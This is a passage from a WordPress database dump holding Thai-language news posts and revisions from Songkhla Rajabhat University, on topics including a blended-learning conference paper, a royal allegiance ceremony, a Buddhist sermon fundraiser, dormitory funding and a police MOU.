ซึ่งเป็นรูปแบบใหม่ที่ได้จากงานวิจัย และนำมาปรับใช้ในสถานการณ์จริงในมหาวิทยาลัย ซึ่งนอกจากมหาวิทยาลัยราชภัฏสงขลาจะได้ประโยชน์จากงานวิจัยชิ้นนี้แล้ว งานวิจัยนี้ยังสามารถปรับใช้ได้กับมหาวิทยาลัยอื่นๆ ที่มีรูปแบบการเรียนคล้ายคลึงกันอีกด้วย\r\n\r\nรองคณบดีบัณฑิตวิทยาลัย มรภ.สงขลา กล่าวว่า การประชุมวิชาการนานาชาติครั้งนี้ จัดโดยองค์กร ELSIN ซึ่งก่อตั้งขึ้นเมื่อปี ค.ศ.1995 เป็นการรวมตัวกันของนักวิชาการทั้งสายวิชาการทางการศึกษา สายวิทยาการคอมพิวเตอร์ และสายเทคโนโลยีสารสนเทศ โดยรูปแบบการนำเสนองานวิจัยประกอบด้วย 2 ส่วน คือ การนำเสนอด้วยปากเปล่า (oral presentation) และการนำเสนอบทความทางวิชาการฉบับเต็ม (full paper) ซึ่งบทความทางวิชาการฉบับเต็มนั้น ผู้นำเสนอจะต้องส่งให้องค์กร ELSIN อ่านก่อนอย่างน้อย 1 เดือน อย่างไรก็ดี การนำเสนองานวิจัยในครั้งนี้ได้รับความสนใจจากนักวิชาการต่างประเทศโดยเฉพาะ กลุ่มประเทศในสหภาพยุโรป และอเมริกา ให้ความสนใจส่งผลงานวิจัยเข้าร่วมนำเสนอกว่า 100 เรื่อง\r\n\r\n“การนำเสนอผลงานในครั้งนี้ถือเป็นมิติใหม่ ของมหาวิทยาลัยราชภัฏสงขลา นอกจากจะนำเสนอผลงานทางวิชาการแล้ว ยังได้ประชาสัมพันธ์มหาวิทยาลัย ให้นักวิชาการทั่วโลกให้รู้จัก ทั้งในเวทีวิชาการและการพบปะนอกรอบ อีกทั้งยังเป็นการสร้างเครือข่ายมหาวิทยาลัย ซึ่งถือเป็นส่วนหนึ่งในการขับเคลื่อนผลงานด้านการวิจัยของมหาวิทยาลัยราชภัฏ สงขลาไปสู่สากล” ผศ.ดร.ศศลักษณ์ กล่าว', 'มรภ.สงขลา วิจัยวิธีเรียนแบบใหม่', '', 'inherit', 'closed', 'closed', '', '624-revision-v1', '', '', '2019-05-27 09:32:19', '2019-05-27 02:32:19', '', 624, 'http://172.17.40.11/wp511/?p=625', 0, 'revision', '', 0),
(626, 1, '2019-05-27 09:32:27', '2019-05-27 02:32:27', '<b>นักวิจัย มรภ.สงขลา หอบผลวิจัยวิธีเรียนรูปแบบใหม่ ผสมผสานการเรียนรู้ในห้องเรียน ควบคู่อีเลินนิ่ง </b><b>ร่วมเสนอผลงานเวทีประชุมวิชาการนานาชาติ</b>\r\n\r\nผศ.ดร.ศศลักษณ์ ทองขาว รองคณบดีบัณฑิตวิทยาลัย และอาจารย์ประจำโปรแกรมวิชาคอมพิวเตอร์ คณะวิทยาศาสตร์และเทคโนโลยี มหาวิทยาลัยราชภัฏสงขลา\r\n\r\nเปิดเผยว่า เมื่อวันที่ 26-28 มิถุนายน ที่ผ่านมา ได้เข้าร่วมนำเสนอผลงานวิจัยในการประชุมวิชาการนานาชาติ The Education, Learning, Styles, Individual differences Network (ELSIN 2012) ครั้งที่ 17 ณ เมืองคาดีฟ ประเทศสหราชอาณาจักร ในหัวข้อเรื่อง ลีลาการเรียนรู้ในสถานการณ์การเรียนรู้แบบผสมผสานบนระบบจัดการการเรียนรู้ (Learning Management System) : กรณีศึกษาเชิงตีความ (Learning Styles and Blended learning Situations on LMS: An Interpretive Case Study) ซึ่งเป็นการศึกษาเกี่ยวกับวิธีการเรียนของผู้เรียนแบบใหม่ ที่เน้นถึงรูปแบบการเรียนรู้แบบผสม (Blended learning) ระหว่างการเรียนแบบในห้องเรียน และการใช้เทคโนโลยีคอมพิวเตอร์ในรูปแบบของการเรียนรู้ผ่านสื่อ อิเล็กทรอนิกส์ หรืออีเลินนิ่ง (e-learning) ซึ่งเป็นรูปแบบใหม่ที่ได้จากงานวิจัย และนำมาปรับใช้ในสถานการณ์จริงในมหาวิทยาลัย ซึ่งนอกจากมหาวิทยาลัยราชภัฏสงขลาจะได้ประโยชน์จากงานวิจัยชิ้นนี้แล้ว งานวิจัยนี้ยังสามารถปรับใช้ได้กับมหาวิทยาลัยอื่นๆ ที่มีรูปแบบการเรียนคล้ายคลึงกันอีกด้วย\r\n\r\nรองคณบดีบัณฑิตวิทยาลัย มรภ.สงขลา กล่าวว่า การประชุมวิชาการนานาชาติครั้งนี้ จัดโดยองค์กร ELSIN ซึ่งก่อตั้งขึ้นเมื่อปี ค.ศ.1995 เป็นการรวมตัวกันของนักวิชาการทั้งสายวิชาการทางการศึกษา สายวิทยาการคอมพิวเตอร์ และสายเทคโนโลยีสารสนเทศ โดยรูปแบบการนำเสนองานวิจัยประกอบด้วย 2 ส่วน คือ การนำเสนอด้วยปากเปล่า (oral presentation) และการนำเสนอบทความทางวิชาการฉบับเต็ม (full paper) ซึ่งบทความทางวิชาการฉบับเต็มนั้น ผู้นำเสนอจะต้องส่งให้องค์กร ELSIN อ่านก่อนอย่างน้อย 1 เดือน อย่างไรก็ดี การนำเสนองานวิจัยในครั้งนี้ได้รับความสนใจจากนักวิชาการต่างประเทศโดยเฉพาะ กลุ่มประเทศในสหภาพยุโรป และอเมริกา ให้ความสนใจส่งผลงานวิจัยเข้าร่วมนำเสนอกว่า 100 เรื่อง\r\n\r\n“การนำเสนอผลงานในครั้งนี้ถือเป็นมิติใหม่ ของมหาวิทยาลัยราชภัฏสงขลา นอกจากจะนำเสนอผลงานทางวิชาการแล้ว ยังได้ประชาสัมพันธ์มหาวิทยาลัย ให้นักวิชาการทั่วโลกให้รู้จัก ทั้งในเวทีวิชาการและการพบปะนอกรอบ อีกทั้งยังเป็นการสร้างเครือข่ายมหาวิทยาลัย ซึ่งถือเป็นส่วนหนึ่งในการขับเคลื่อนผลงานด้านการวิจัยของมหาวิทยาลัยราชภัฏ สงขลาไปสู่สากล” ผศ.ดร.ศศลักษณ์ กล่าว', 'มรภ.สงขลา วิจัยวิธีเรียนแบบใหม่', '', 'inherit', 'closed', 'closed', '', '624-revision-v1', '', '', '2019-05-27 09:32:27', '2019-05-27 02:32:27', '', 624, 'http://172.17.40.11/wp511/?p=626', 0, 'revision', '', 0),
(627, 1, '2019-05-27 09:33:32', '2019-05-27 02:33:32', 'เมื่อเข้ามาเรียนยัง รั้วมหาวิทยาลัยราชภัฏสงขลา นักศึกษาใหม่ทุกคนจะได้เข้าร่วมในพิธีนำน้องถวายตนเป็นคนของพระราชา ซึ่งเป็นพิธีอันทรงเกียรติที่แสดงถึงการเป็นส่วนหนึ่งของเลือดแห่งราชภัฏโดยสมบูรณ์\r\n\r\nเมื่อเร็วๆ นี้มหาวิทยาลัยราชภัฏสงขลา (มรภ.สงขลา) ได้จัดพิธีนำน้องถวายตัวเป็นคนของพระราชา ณ บริเวณสนามกีฬามหาวิทยาลัยราชภัฏสงขลา\r\n\r\nซึ่งพิธีดังกล่าว เกิดขึ้นโดยความมุ่งหวังของมหาวิทยาลัยราชภัฏสงขลา ในอันที่จะสนองพระมหากรุณาธิคุณของพระบาทสมเด็จพระเจ้าอยู่หัว ที่ทรงรับมหาวิทยาลัยราชภัฏทั่วประเทศ เป็นคนของพระราชา ตามนามพระราชทาน มหาวิทยาลัยราชภัฏสงขลาจึงจัดกิจกรรมดังกล่าวขึ้นเป็นปีที่สองติดต่อกัน\r\n\r\nไฮไลท์ของพิธีดังกล่าว อยู่ที่การอัญเชิญตราพระราชลัญจกรประจำพระองค์ ซึ่งใช้เป็นตราประจำมหาวิทยาลัยราชภัฏทั่วประเทศ นำมาประดิษฐานบนเสลี่ยงหาม และส่งมอบให้กับผู้แทนองค์การนักศึกษา เพื่อมอบต่อไปยังนายกสโมสรนักศึกษาทั้ง 7 คณะ จากนั้นอัญเชิญเสี่ยงหามตรามหาวิทยาลัยราชภัฏ ส่งมอบให้กับตัวแทนกรรมการสภานักศึกษา เพื่ออัญเชิญตราพระราชลัญจกรไปประดิษฐาน ณ แท่นประดิษฐานบนอัฒจันทร์ ปิดท้ายด้วยอธิการบดีมหาวิทยาลัยราชภัฏสงขลา กล่าวรับรองการถวายตัวเป็นคนของพระราชา และมอบเข็มเครื่องหมายให้แก่ประธานโปรแกรมวิชาทุกสาขาวิชา\r\n\r\nในการนี้นักศึกษาใหม่และตัวแทนนักศึกษารุ่นพี่จากทั้ง\r\n\r\n7 คณะ ได้เข้าร่วมกิจกรรมดังกล่าวโดยพร้อมเพรียงกัน บรรยากาศเต็มไปด้วยความภาคภูมิใจและความปีติยินดี กับการได้ชื่อว่าเป็นคนของพระราชา แม้อากาศยามบ่ายจะร้อนอบอ้าวสักเพียงใดก็ตาม แต่รอยยิ้มแห่งความปลื้มปีติก็ประดับอยู่บนใบหน้าของนักศึกษาทุกคนที่เข้า ร่วมกิจกรรม', 'มรภ.สงขลา นำน้องถวายตัวเป็นคนของพระราชา', '', 'inherit', 'closed', 'closed', '', '615-revision-v1', '', '', '2019-05-27 09:33:32', '2019-05-27 02:33:32', '', 615, 'http://172.17.40.11/wp511/?p=627', 0, 'revision', '', 0),
(628, 1, '2019-05-27 09:34:29', '2019-05-27 02:34:29', 'มรภ.สงขลา จัดเทศน์มหาชาติทรงเครื่อง ร่วมสร้างพุทธมณฑลจังหวัด\r\n\r\nผศ.ดร.ไพโรจน์ ด้วงวิเศษ อธิการบดีมหาวิทยาลัยราชภัฏสงขลา กล่าวถึงการจัดงานบุญบำเพ็ญมหากุศลเทศน์มหาชาติทรงเครื่อง เฉลิมพระเกียรติพระบาทสมเด็จพระเจ้าอยู่หัว ทรงเจริญพระชนมพรรษา 85 พรรษา สมเด็จพระนางเจ้าฯ พระบรมราชินีนาถ ทรงเจริญพระชนมพรรษา 80 พรรษา สมเด็จพระบรมโอรสาธิราชฯ สยามมกุฎราชกุมาร ทรงเจริญพระชนมพรรษา 60 พรรษา ซึ่งคณะสงฆ์จังหวัดสงขลา คณะสงฆ์ไทยในประเทศมาเลเซียและสิงคโปร์ ร่วมกับมหาวิทยาลัยราชภัฏสงขลาจัดขึ้น ว่า การจัดงานเทศน์มหาชาติทรงเครื่อง จะมีขึ้นในวันที่ 17-18 สิงหาคม นี้ ณ หอประชุมเฉลิมพระเกียรติฯ มหาวิทยาลัยราชภัฏสงขลา นำเงินบุญสมทบสร้างพุทธมณฑลจังหวัดสงขลา เพื่อให้เป็นศูนย์กลางพระพุทธศาสนาของจังหวัด และสำหรับใช้เป็นสถานที่ประกอบกิจกรรมทางพระพุทธศาสนา การศึกษา อบรม การปฏิบัติธรรม และเป็นสถานที่พักผ่อนทางกายและใจ ทั้งนี้ ผู้มีจิตศรัทธาสามารถจองเป็นเจ้าภาพกัณฑ์เทศน์ และร่วมตั้งโรงทานบริจาคข้าวสาร ขนมจีนแกงไตปลา ไข่ ปลาสด ปลาแห้ง น้ำมันพืช ผักเครื่องเคียง ฯลฯ ได้ ณ กองพัฒนานักศึกษา มหาวิทยาลัยราชภัฏสงขลา โทร. 0-7431-1210, 0-7433-6933, 0-7432-5007 ต่อ 148, 150, 130 หรือ 087-3902472 หรือโอนเงินบริจาคเข้าบัญชีธนาคาร ซีไอเอ็มบี ไทย จำกัด สงขลา เลขที่บัญชี 70-0365154-5 ชื่อบัญชีมหาวิทยาลัยราชภัฏสงขลา\r\n\r\n“การเทศน์มหาชาติคือมหากุศลที่เตือนบุคคลให้น้อมรำลึกถึงการบำเพ็ญบุญบริจาคทาน สละทรัพย์ ลดความตระหนี่ในใจ สละความเห็นแก่ตัวเพื่อผลประโยชน์อันไพศาลของมวลมนุษยชาติ ชาวพุทธเชื่อว่าการได้ฟังพุทธวจนะย่อมเกิดอานิสงส์และกุศลราศีแก่ตน นอกจากนี้ ยังเป็นการสนับสนุนให้มีการศึกษาปริยัติสัทธรรม และเป็นการสืบทอดพระศาสนา เชื่อกันว่าผู้ใดได้ฟังเทศน์มหาชาติหรือเวสสันดรชาดกครบ 13 กัณฑ์ 1,000 พระคาถา จบภายในหนึ่งวัน และบูชาด้วยดอกไม้ธูปเทียนแต่ละอย่างให้ครบพัน จะเป็นสิริมงคลแก่ตนเองอย่างยิ่ง” อธิการบดีมหาวิทยาลัยราชภัฏสงขลา กล่าว', 'มรภ.สงขลา จัดเทศน์มหาชาติทรงเครื่อง', '', 'publish', 'closed', 'open', '', '%e0%b8%a1%e0%b8%a3%e0%b8%a0-%e0%b8%aa%e0%b8%87%e0%b8%82%e0%b8%a5%e0%b8%b2-%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b9%80%e0%b8%97%e0%b8%a8%e0%b8%99%e0%b9%8c%e0%b8%a1%e0%b8%ab%e0%b8%b2%e0%b8%8a%e0%b8%b2%e0%b8%95', '', '', '2019-05-27 09:34:29', '2019-05-27 02:34:29', '', 0, 'http://172.17.40.11/wp511/?p=628', 0, 'post', '', 0),
(629, 1, '2019-05-27 09:34:29', '2019-05-27 02:34:29', 'มรภ.สงขลา จัดเทศน์มหาชาติทรงเครื่อง ร่วมสร้างพุทธมณฑลจังหวัด\r\n\r\nผศ.ดร.ไพโรจน์ ด้วงวิเศษ อธิการบดีมหาวิทยาลัยราชภัฏสงขลา กล่าวถึงการจัดงานบุญบำเพ็ญมหากุศลเทศน์มหาชาติทรงเครื่อง เฉลิมพระเกียรติพระบาทสมเด็จพระเจ้าอยู่หัว ทรงเจริญพระชนมพรรษา 85 พรรษา สมเด็จพระนางเจ้าฯ พระบรมราชินีนาถ ทรงเจริญพระชนมพรรษา 80 พรรษา สมเด็จพระบรมโอรสาธิราชฯ สยามมกุฎราชกุมาร ทรงเจริญพระชนมพรรษา 60 พรรษา ซึ่งคณะสงฆ์จังหวัดสงขลา คณะสงฆ์ไทยในประเทศมาเลเซียและสิงคโปร์ ร่วมกับมหาวิทยาลัยราชภัฏสงขลาจัดขึ้น ว่า การจัดงานเทศน์มหาชาติทรงเครื่อง จะมีขึ้นในวันที่ 17-18 สิงหาคม นี้ ณ หอประชุมเฉลิมพระเกียรติฯ มหาวิทยาลัยราชภัฏสงขลา นำเงินบุญสมทบสร้างพุทธมณฑลจังหวัดสงขลา เพื่อให้เป็นศูนย์กลางพระพุทธศาสนาของจังหวัด และสำหรับใช้เป็นสถานที่ประกอบกิจกรรมทางพระพุทธศาสนา การศึกษา อบรม การปฏิบัติธรรม และเป็นสถานที่พักผ่อนทางกายและใจ ทั้งนี้ ผู้มีจิตศรัทธาสามารถจองเป็นเจ้าภาพกัณฑ์เทศน์ และร่วมตั้งโรงทานบริจาคข้าวสาร ขนมจีนแกงไตปลา ไข่ ปลาสด ปลาแห้ง น้ำมันพืช ผักเครื่องเคียง ฯลฯ ได้ ณ กองพัฒนานักศึกษา มหาวิทยาลัยราชภัฏสงขลา โทร. 0-7431-1210, 0-7433-6933, 0-7432-5007 ต่อ 148, 150, 130 หรือ 087-3902472 หรือโอนเงินบริจาคเข้าบัญชีธนาคาร ซีไอเอ็มบี ไทย จำกัด สงขลา เลขที่บัญชี 70-0365154-5 ชื่อบัญชีมหาวิทยาลัยราชภัฏสงขลา\r\n\r\n“การเทศน์มหาชาติคือมหากุศลที่เตือนบุคคลให้น้อมรำลึกถึงการบำเพ็ญบุญบริจาคทาน สละทรัพย์ ลดความตระหนี่ในใจ สละความเห็นแก่ตัวเพื่อผลประโยชน์อันไพศาลของมวลมนุษยชาติ ชาวพุทธเชื่อว่าการได้ฟังพุทธวจนะย่อมเกิดอานิสงส์และกุศลราศีแก่ตน นอกจากนี้ ยังเป็นการสนับสนุนให้มีการศึกษาปริยัติสัทธรรม และเป็นการสืบทอดพระศาสนา เชื่อกันว่าผู้ใดได้ฟังเทศน์มหาชาติหรือเวสสันดรชาดกครบ 13 กัณฑ์ 1,000 พระคาถา จบภายในหนึ่งวัน และบูชาด้วยดอกไม้ธูปเทียนแต่ละอย่างให้ครบพัน จะเป็นสิริมงคลแก่ตนเองอย่างยิ่ง” อธิการบดีมหาวิทยาลัยราชภัฏสงขลา กล่าว', 'มรภ.สงขลา จัดเทศน์มหาชาติทรงเครื่อง', '', 'inherit', 'closed', 'closed', '', '628-revision-v1', '', '', '2019-05-27 09:34:29', '2019-05-27 02:34:29', '', 628, 'http://172.17.40.11/wp511/?p=629', 0, 'revision', '', 0),
(630, 1, '2019-05-27 09:35:17', '2019-05-27 02:35:17', 'ครม. ฉลุยงบ 110 ล. มรภ.สงขลา สร้างหอพัก นศ. วิทยาเขตสตูล\r\n\r\n<b>มรภ.สงขลา เฮ ครม.มีมติอนุมัติงบประมาณ 110 ล้านบาท สร้างหอพักนักศึกษาวิทยาเขตสตูล </b><b>ลดความเสี่ยงอันตรายจากการเดินทาง รองรับผู้เรียน 3 จังหวัดชายแดนใต้</b>\r\n\r\nดร.แสนศักดิ์ ศิริพานิช รองอธิการบดีฝ่ายวิจัยและชุมชนสัมพันธ์ มหาวิทยาลัยราชภัฏสงขลา (มรภ.สงขลา) เปิดเผยว่า เมื่อวันที่ 30 กรกฎาคม ที่ผ่านมา ณ มหาวิทยาลัยราชภัฎสุรินทร์ ที่ประชุมคณะรัฐมนตรี โดย นางสาวยิ่งลักษณ์ ชินวัตร นายกรัฐมนตรี เป็นประธานการประชุมคณะรัฐมนตรี (ครม.) ได้มีมติเห็นชอบตามมติคณะกรรมการยุทธศาสตร์ด้านการพัฒนาจังหวัดชายแดนภาคใต้ (กพต.) ครั้งที่ 3/2555 (นายยงยุทธ วิชัยดิษฐ รองนายกรัฐมนตรี เป็นประธาน เมื่อวันที่ 27 มิถุนายน 2555 ณ ทำเนียบรัฐบาล กรุงเทพฯ) อนุมัติงบประมาณรายจ่ายประจำปีงบประมาณ พ.ศ. 2556 ให้มหาวิทยาลัยราชภัฎสงขลา เพิ่มเติม สำหรับก่อสร้างอาคารหอพักนักศึกษา พร้อมครุภัณฑ์ประจำอาคาร มหาวิทยาลัยราชภัฎสงขลา วิทยาเขตสตูล จำนวน 1 หลัง งบประมาณ 110 ล้านบาท\r\n\r\nดร.แสนศักดิ์ กล่าวว่า ปัจจุบัน มรภ.สงขลา วิทยาเขตสตูล เปิดการเรียนการสอนในสาขาอุตสาหกรรมท่องเที่ยว มีนักศึกษาทั้งในพื้นที่จังหวัดสตูล และ 3 จังหวัดชายแดนภาคใต้ รวมทั้งสิ้น 97 คน ซึ่งการเดินทางไปกลับของนักศึกษามีความเสี่ยง ไม่ปลอดภัย จึงมีความจำเป็นต้องก่อสร้างอาคารหอพักนักศึกษา พร้อมครุภัณฑ์ประจำอาคาร จำนวน 1 หลัง งบประมาณ 110 ล้านบาท จึงเสนอ กพต. เพื่อขอความเห็นชอบในหลักการให้กระทรวงศึกษาธิการ แปรญัตติเพิ่มงบประมาณรายจ่าย ประจำปีงบประมาณ พ.ศ.2556 สำหรับก่อสร้างอาคารหอพักนักศึกษาดังกล่าว ในการนี้ กระทรวงศึกษาธิการได้จัดโครงการดังกล่าวไว้ในแผนแล้ว เนื่องจากนักศึกษาที่ไปเรียนที่วิทยาเขตสตูลไม่มีที่พัก จึงต้องสร้างหอพักเพื่อรองรับนักศึกษาดังกล่าว', 'ครม. ฉลุยงบ 110 ล. มรภ.สงขลา สร้างหอพัก', '', 'publish', 'closed', 'open', '', '%e0%b8%84%e0%b8%a3%e0%b8%a1-%e0%b8%89%e0%b8%a5%e0%b8%b8%e0%b8%a2%e0%b8%87%e0%b8%9a-110-%e0%b8%a5-%e0%b8%a1%e0%b8%a3%e0%b8%a0-%e0%b8%aa%e0%b8%87%e0%b8%82%e0%b8%a5%e0%b8%b2-%e0%b8%aa%e0%b8%a3%e0%b9%89', '', '', '2019-05-27 09:35:17', '2019-05-27 02:35:17', '', 0, 'http://172.17.40.11/wp511/?p=630', 0, 'post', '', 0),
(631, 1, '2019-05-27 09:35:17', '2019-05-27 02:35:17', 'ครม. ฉลุยงบ 110 ล. มรภ.สงขลา สร้างหอพัก นศ. วิทยาเขตสตูล\r\n\r\n<b>มรภ.สงขลา เฮ ครม.มีมติอนุมัติงบประมาณ 110 ล้านบาท สร้างหอพักนักศึกษาวิทยาเขตสตูล </b><b>ลดความเสี่ยงอันตรายจากการเดินทาง รองรับผู้เรียน 3 จังหวัดชายแดนใต้</b>\r\n\r\nดร.แสนศักดิ์ ศิริพานิช รองอธิการบดีฝ่ายวิจัยและชุมชนสัมพันธ์ มหาวิทยาลัยราชภัฏสงขลา (มรภ.สงขลา) เปิดเผยว่า เมื่อวันที่ 30 กรกฎาคม ที่ผ่านมา ณ มหาวิทยาลัยราชภัฎสุรินทร์ ที่ประชุมคณะรัฐมนตรี โดย นางสาวยิ่งลักษณ์ ชินวัตร นายกรัฐมนตรี เป็นประธานการประชุมคณะรัฐมนตรี (ครม.) ได้มีมติเห็นชอบตามมติคณะกรรมการยุทธศาสตร์ด้านการพัฒนาจังหวัดชายแดนภาคใต้ (กพต.) ครั้งที่ 3/2555 (นายยงยุทธ วิชัยดิษฐ รองนายกรัฐมนตรี เป็นประธาน เมื่อวันที่ 27 มิถุนายน 2555 ณ ทำเนียบรัฐบาล กรุงเทพฯ) อนุมัติงบประมาณรายจ่ายประจำปีงบประมาณ พ.ศ. 2556 ให้มหาวิทยาลัยราชภัฎสงขลา เพิ่มเติม สำหรับก่อสร้างอาคารหอพักนักศึกษา พร้อมครุภัณฑ์ประจำอาคาร มหาวิทยาลัยราชภัฎสงขลา วิทยาเขตสตูล จำนวน 1 หลัง งบประมาณ 110 ล้านบาท\r\n\r\nดร.แสนศักดิ์ กล่าวว่า ปัจจุบัน มรภ.สงขลา วิทยาเขตสตูล เปิดการเรียนการสอนในสาขาอุตสาหกรรมท่องเที่ยว มีนักศึกษาทั้งในพื้นที่จังหวัดสตูล และ 3 จังหวัดชายแดนภาคใต้ รวมทั้งสิ้น 97 คน ซึ่งการเดินทางไปกลับของนักศึกษามีความเสี่ยง ไม่ปลอดภัย จึงมีความจำเป็นต้องก่อสร้างอาคารหอพักนักศึกษา พร้อมครุภัณฑ์ประจำอาคาร จำนวน 1 หลัง งบประมาณ 110 ล้านบาท จึงเสนอ กพต. เพื่อขอความเห็นชอบในหลักการให้กระทรวงศึกษาธิการ แปรญัตติเพิ่มงบประมาณรายจ่าย ประจำปีงบประมาณ พ.ศ.2556 สำหรับก่อสร้างอาคารหอพักนักศึกษาดังกล่าว ในการนี้ กระทรวงศึกษาธิการได้จัดโครงการดังกล่าวไว้ในแผนแล้ว เนื่องจากนักศึกษาที่ไปเรียนที่วิทยาเขตสตูลไม่มีที่พัก จึงต้องสร้างหอพักเพื่อรองรับนักศึกษาดังกล่าว', 'ครม. ฉลุยงบ 110 ล. มรภ.สงขลา สร้างหอพัก', '', 'inherit', 'closed', 'closed', '', '630-revision-v1', '', '', '2019-05-27 09:35:17', '2019-05-27 02:35:17', '', 630, 'http://172.17.40.11/wp511/?p=631', 0, 'revision', '', 0),
(632, 1, '2019-05-27 09:35:22', '2019-05-27 02:35:22', 'ครม. ฉลุยงบ 110 ล. มรภ.สงขลา สร้างหอพัก นศ. วิทยาเขตสตูล\r\n\r\n<b>มรภ.สงขลา เฮ ครม.มีมติอนุมัติงบประมาณ 110 ล้านบาท สร้างหอพักนักศึกษาวิทยาเขตสตูล </b><b>ลดความเสี่ยงอันตรายจากการเดินทาง รองรับผู้เรียน 3 จังหวัดชายแดนใต้</b>\r\n\r\nดร.แสนศักดิ์ ศิริพานิช รองอธิการบดีฝ่ายวิจัยและชุมชนสัมพันธ์ มหาวิทยาลัยราชภัฏสงขลา (มรภ.สงขลา) เปิดเผยว่า เมื่อวันที่ 30 กรกฎาคม ที่ผ่านมา ณ มหาวิทยาลัยราชภัฎสุรินทร์ ที่ประชุมคณะรัฐมนตรี โดย นางสาวยิ่งลักษณ์ ชินวัตร นายกรัฐมนตรี เป็นประธานการประชุมคณะรัฐมนตรี (ครม.) ได้มีมติเห็นชอบตามมติคณะกรรมการยุทธศาสตร์ด้านการพัฒนาจังหวัดชายแดนภาคใต้ (กพต.) ครั้งที่ 3/2555 (นายยงยุทธ วิชัยดิษฐ รองนายกรัฐมนตรี เป็นประธาน เมื่อวันที่ 27 มิถุนายน 2555 ณ ทำเนียบรัฐบาล กรุงเทพฯ) อนุมัติงบประมาณรายจ่ายประจำปีงบประมาณ พ.ศ. 2556 ให้มหาวิทยาลัยราชภัฎสงขลา เพิ่มเติม สำหรับก่อสร้างอาคารหอพักนักศึกษา พร้อมครุภัณฑ์ประจำอาคาร มหาวิทยาลัยราชภัฎสงขลา วิทยาเขตสตูล จำนวน 1 หลัง งบประมาณ 110 ล้านบาท\r\n\r\nดร.แสนศักดิ์ กล่าวว่า ปัจจุบัน มรภ.สงขลา วิทยาเขตสตูล เปิดการเรียนการสอนในสาขาอุตสาหกรรมท่องเที่ยว มีนักศึกษาทั้งในพื้นที่จังหวัดสตูล และ 3 จังหวัดชายแดนภาคใต้ รวมทั้งสิ้น 97 คน ซึ่งการเดินทางไปกลับของนักศึกษามีความเสี่ยง ไม่ปลอดภัย จึงมีความจำเป็นต้องก่อสร้างอาคารหอพักนักศึกษา พร้อมครุภัณฑ์ประจำอาคาร จำนวน 1 หลัง งบประมาณ 110 ล้านบาท จึงเสนอ กพต. เพื่อขอความเห็นชอบในหลักการให้กระทรวงศึกษาธิการ แปรญัตติเพิ่มงบประมาณรายจ่าย ประจำปีงบประมาณ พ.ศ.2556 สำหรับก่อสร้างอาคารหอพักนักศึกษาดังกล่าว ในการนี้ กระทรวงศึกษาธิการได้จัดโครงการดังกล่าวไว้ในแผนแล้ว เนื่องจากนักศึกษาที่ไปเรียนที่วิทยาเขตสตูลไม่มีที่พัก จึงต้องสร้างหอพักเพื่อรองรับนักศึกษาดังกล่าว', 'ครม. ฉลุยงบ 110 ล. มรภ.สงขลา สร้างหอพัก', '', 'inherit', 'closed', 'closed', '', '630-autosave-v1', '', '', '2019-05-27 09:35:22', '2019-05-27 02:35:22', '', 630, 'http://172.17.40.11/wp511/?p=632', 0, 'revision', '', 0),
(633, 1, '2019-05-27 09:36:06', '2019-05-27 02:36:06', 'เครือข่ายราชภัฏ ทำ ‘MOU’ ประเมินผลงาน ตร.ทางหลวง\r\n\r\n<b>มหาวิทยาลัยราชภัฏทั่วประเทศ ลงนามข้อตกลงความร่วมมือตำรวจทางหลวง ประเมินผลโครงการคืนชุมชนสีขาวให้สังคมไทย ภายใต้หลักการตำรวจผู้รับใช้ชุมชน</b>\r\n\r\nดร.แสนศักดิ์ ศิริพานิช รองอธิการบดีฝ่ายวิจัยและชุมชนสัมพันธ์ มหาวิทยาลัยราชภัฏสงขลา (มรภ.สงขลา) เปิดเผยว่า เมื่อวันที่ 28 กรกฎาคม ที่ผ่านมา มรภ.สงขลา ได้ร่วมลงนามข้อตกลงความร่วมมือตามโครงการคืนชุมชนสีขาวให้สังคมไทยโดยตำรวจทางหลวง ภายใต้หลักการตำรวจผู้รับใช้ชุมชน (Community Policing) ณ กระทรวงศึกษาธิการ ระหว่าง รศ.ดร.เปรื่อง กิจรัตน์ภร ประธานที่ประชุมอธิการบดีมหาวิทยาลัยราชภัฏ พร้อมด้วยอธิการบดี มรภ.สงขลา ผศ.ดร.ไพโรจน์ ด้วงวิเศษ และอธิการบดีมหาวิทยาลัยราชภัฏทั่วประเทศทั้ง 40 แห่ง กับ พล.ต.ต.นรบุญ แน่นหนา ผู้บังคับการตำรวจทางหลวง สำนักงานตำรวจแห่งชาติ ในการสำรวจความคิดเห็นของประชาชนต่อการดำเนินงานและประเมินผลความสำเร็จโครงการฯ โดยคณะทำงานได้จัดทำแบบสอบถามวัดระดับความพึงพอใจในการให้บริการแก่ประชาชน และจะสรุปรายงาน วิเคราะห์ปัจจัยความสำเร็จ ปัญหาและอุปสรรคของโครงการ เพื่อให้เกิดความบริสุทธิ์ยุติธรรม มีประสิทธิภาพและต่อเนื่อง ทั้งนี้ข้อตกลงเบื้องต้นจะมีการเก็บข้อมูลในชุมชนเป้าหมาย 40 ชุมชนทั่วประเทศ ใน 3 ช่วงเวลา คือ ช่วงเริ่มดำเนินการ (กันยายน 2555) ช่วงระหว่างดำเนินการ (พฤษภาคม 2556) และ ช่วงหลังดำเนินการ (ธันวาคม 2556) เพื่อให้ได้ข้อมูลที่สามารถสะท้อนความสำเร็จของโครงการฯ ตามที่ตั้งไว้อย่างแท้จริง และเป็นการเรียนรู้ในการทำงานร่วมกันอย่างสร้างสรรค์ระหว่างหน่วยงานทั้งสอง และชุมชนเป้าหมาย ซึ่งจะก่อให้เกิดประโยชน์ต่อชุมชน สังคม และประเทศชาติ ต่อไป\r\n\r\nด้าน พล.ต.ต.นรบุญ แน่นหนา ผู้บังคับการตำรวจทางหลวง กล่าวว่า ในการดำเนินโครงการจะให้เจ้าหน้าที่ตำรวจทางหลวงที่ผ่านการฝึกอบรม เข้าไปคลุกคลี เรียนรู้และแลกเปลี่ยนความคิดเห็นกับคนในชุมชน รวมถึงศึกษาข้อมูลอาชญากรรม และรวบรวมรายละเอียดสภาพแวดล้อมความเป็นมาของชุมชน เพื่อวางแผนป้องกันอาชญากรรมที่จะเกิดขึ้นในชุมชนนั้นๆ โดยนำหลักรัฐศาสตร์มาประยุกต์ใช้ ร่วมกับการบังคับใช้กฎหมาย เพื่อสร้างความไว้วางใจระหว่างตำรวจกับชาวบ้าน โดยให้ตำรวจชุดดังกล่าวเปลี่ยนทิศทางการทำงาน จากการเป็นผู้ใช้อำนาจบังคับใช้กฎหมายกับประชาชน เป็นการหันหน้าเข้าหาประชาชน ทำหน้าที่ปกป้องและให้บริการ สร้างความคุ้นเคยด้วยความจริงใจ เมื่อประชาชนไว้วางใจก็จะให้ข้อมูล ให้ข่าว บอกปัญหาและความต้องการให้ทราบ 